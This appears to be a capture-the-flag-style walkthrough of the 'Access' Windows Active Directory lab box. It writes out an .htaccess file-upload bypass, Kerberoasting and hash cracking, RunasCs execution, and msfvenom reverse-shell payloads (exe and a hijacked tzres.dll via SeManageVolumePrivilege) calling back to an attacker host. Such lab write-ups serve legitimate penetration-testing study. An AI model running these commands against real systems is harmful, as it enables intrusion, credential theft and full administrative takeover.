Access (Intermediate, Windows AD, 2022) ★ -- .htaccess, Invoke-runasCs, SeManageVolumePrivilege

WDavid404 commented 1 month ago

The community has rated it ‘Very Hard’.

Keypoints:

For apache server, we can upload .htaccess file to define our file extention echo "AddType application/x-httpd-php .xxx" > .htaccess
Get a Service Principal Name --> Use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)

Invoke Kerberaost

Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ascii hashes.txt

Runas script https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1

[kali]msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=445 -f exe > shell.exe
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:/users/public/shell.exe"

[PE]SeManageVolumePrivilege --> use SeManageVolumeExploit.exe SeManageVolumeExploit.exe let us have full control over C:/ --> we made a dll named tzres.dll msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll place a DLL as C:\Windows\System32\wbem\tzres.dll --> then run "systeminfo" command --> tzres.dll will be loaded so we can get reverse shell as administartor.

WDavid404 commented 1 month ago

PORT      STATE SERVICE           REASON          VERSION
53/tcp    open  domain            syn-ack ttl 125 Simple DNS Plus

80/tcp    open  http              syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)

88/tcp    open  kerberos-sec?     syn-ack ttl 125

135/tcp   open  msrpc             syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 125 Microsoft Windows netbios-ssn

389/tcp   open  ldap              syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds?     syn-ack ttl 125
464/tcp   open  kpasswd5?         syn-ack ttl 125
593/tcp   open  ncacn_http        syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?          syn-ack ttl 125

3268/tcp  open  ldap              syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)

3269/tcp  open  globalcatLDAPssl? syn-ack ttl 125

5985/tcp  open  http              syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

9389/tcp  open  mc-nmf            syn-ack ttl 125 .NET Message Framing

49666/tcp open  unknown           syn-ack ttl 125
49668/tcp open  unknown           syn-ack ttl 125
49673/tcp open  ncacn_http        syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  unknown           syn-ack ttl 125
49677/tcp open  unknown           syn-ack ttl 125
49704/tcp open  unknown           syn-ack ttl 125
49795/tcp open  unknown           syn-ack ttl 125

53/tcp

dig axfr @192.168.211.187 -->

; <<>> DiG 9.19.21-1+b1-Debian <<>> axfr @192.168.211.187
; (1 server found)
;; global options: +cmd
.                       85731   IN      NS      h.root-servers.net.
.                       85731   IN      NS      d.root-servers.net.
.                       85731   IN      NS      a.root-servers.net.
.                       85731   IN      NS      l.root-servers.net.
.                       85731   IN      NS      g.root-servers.net.
.                       85731   IN      NS      c.root-servers.net.
.                       85731   IN      NS      i.root-servers.net.
.                       85731   IN      NS      e.root-servers.net.
.                       85731   IN      NS      j.root-servers.net.
.                       85731   IN      NS      m.root-servers.net.
.                       85731   IN      NS      k.root-servers.net.
.                       85731   IN      NS      b.root-servers.net.
.                       85731   IN      NS      f.root-servers.net.
h.root-servers.net.     86399   IN      A       198.97.190.53
f.root-servers.net.     85731   IN      A       192.5.5.241
;; Query time: 96 msec
;; SERVER: 192.168.211.187#53(192.168.211.187) (UDP)
;; WHEN: Wed Aug 07 20:47:57 EDT 2024
;; MSG SIZE  rcvd: 284

139/tcp

no info

389/tcp

ldapsearch -H ldap://192.168.211.187 -x -s base namingcontexts -->

dn:
namingcontexts: DC=access,DC=offsec
namingcontexts: CN=Configuration,DC=access,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=access,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=access,DC=offsec

ldapsearch -H ldap://192.168.211.187 -x -b"DC=access,DC=offsec"

80/tcp

source code --> TheEvent - v4.6.0

ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.221.187/FUZZ --> no info

Click "Send Message" button

Buy ticket Try uploading a php file

upload file with php.gif extension we can found this file on /uploads/ but we cannot execute it.

After some try, found that apart from known script extensions like ".php" and ".php4", I was able to upload files with my own extension such as ".xxx". But the server didn't render the shell at all for unknown extension, it just printed out the source code.

Solution: The server is apache. So we could potentially upload a ".htaccess" file to the directory to let the server render my ".xxx" extension as PHP script. Refer to video (https://www.youtube.com/watch?v=xZd1JWmLGLk)

echo "AddType application/x-httpd-php .xxx" > .htaccess and upload .htaccess change the reverse shell php (Ivan Sincek) from .php to .xxx, and upload it Access /uploads/.xxx --> got a reverse shell

WDavid404 commented 1 month ago

PE

it’s an Active Directory machine, we could look for some AD credentials…or we could make some.

We will start by getting a Service Principal Name. Use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)

Now that we have the SPN, we are able to request a ticket and store it in memory with the end goal of getting it’s hash. To request the ticket, two commands can be executed to request and store the ticket in the memory.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

Extracting the hash can also be done with a handy Powershell Empire script that engages Kerberos. [kali]wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ascii hashes.txt

crack the hash hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt --> trustno1

--> didn't work

We should use runas script.. https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1 (RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials.)

Import-Module ./Invoke-RunasCs.ps1 at first. Try it : Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"

[kali]msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=445 -f exe > shell.exe
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:/users/public/shell.exe"

Use this tool (SeManageVolumeExploit.exe) for SeManageVolumePrivilege

Now we can write to the C: drive.

The general idea is that the attacker can leverage this particular privilege with the exploitation to get full control over "C:\", and then it can craft a ".dll" file and place it in somewhere "C:\Windows\System32\" to trigger the payload as root.

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll place a DLL as C:\Windows\System32\wbem\tzres.dll and then run systeminfo command

--> we can get a reverse shell.

WDavid404 / PG-Box